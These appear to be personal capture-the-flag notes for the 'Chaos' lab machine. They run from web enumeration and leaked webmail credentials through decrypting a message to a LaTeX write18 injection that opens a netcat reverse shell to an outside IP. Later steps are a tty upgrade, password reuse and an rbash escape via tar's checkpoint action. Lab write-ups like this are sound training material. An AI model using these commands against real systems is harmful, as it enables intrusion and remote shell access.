#10.10.10.120
#PORT - 80, 110(pop3), 143(imap), 993(imap/ssl), 995(pop3/ssl), 10000(tcp)

#nmap scan
#dirb 
dirb http://10.10.10.120      (found-  /wp/)    [usefull]
dirb http://10.10.10.120:10000   (found- /e107_admin ,Education, ejo, esupport, hadoop, level, logging )    [not usefull]

#go to 10.10.10.120/wp/
#click on "ONOCTOBER 28, 2018" 
#type password :  HUMAN
#cred found for webmail 
#USERNAME= ayush
#PASSWD= jiujitsu


---------------------------------------------------------------------
#TWO method to connect to webmail
---------------------------------------------------------------------
#1st method (GUI) using EVOLUTION Application (used method)
apt install evolution
#create account for user ayush(email= ayush@10.10.10.120) on imap (993) server
#one mail in "Drafts" 
#two files found (enim_msg.txt, en.py)
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
#2nd method using openssl to connect to pop mail server
openssl s_client -connect 10.10.10.120:993
tag login ayush jiujitsu
tag list "" "*"
tag select Drafts
tag STATUS Drafts (MESSAGES)
tag fetch 1 (FLAGS BODY[HEADER.FIELDS (DATE FROM SUBJECT)])
tag UID SEARCH FROM ayush@localhost    (UID = 4)
tag FETCH 1 (BODY)
----------------------------------------------------------------------
----------------------------------------------------------------------

#Decrypting enim_msg.txt file
# 1st method is to use crypto.py to decrypt the file
# 2nd method to use openssl      (used method)

openssl enc -aes-256-cbc -nosalt -md sha256 -d -in enim_msg.txt -out msg.txt -k sahay
cat msg.txt
#base64 decode online  (content inside 'decrypted_file')

#add "chaos.htb	10.10.10.120" into hosts file
#now access : http://chaos.htb/J00_w1ll_f1Nd_n07H1n9_H3r3/

#send request and check burp Response
#search on google:  "pdftex vulnerability latex injection"
>>>https://0day.work/hacking-with-latex/

#use this command to get shell
\immediate\write18{rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.12.38 4444 >/tmp/f}

------------------------------------------------------------------------------------------

#got the "www-data"
#to get tty shell, run
bash
python -c 'import pty;pty.spawn("/bin/sh")'

#get ayush user
su ayush
PASSWD= jiujitsu

#get out of rbash
tar cf /dev/null testfile --checkpoint=1 --checkpoint-action=exec=/bin/bash
#set PATH variable
export PATH="$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"


#key
eef39126d9c3b4b8a30286970dc713e1


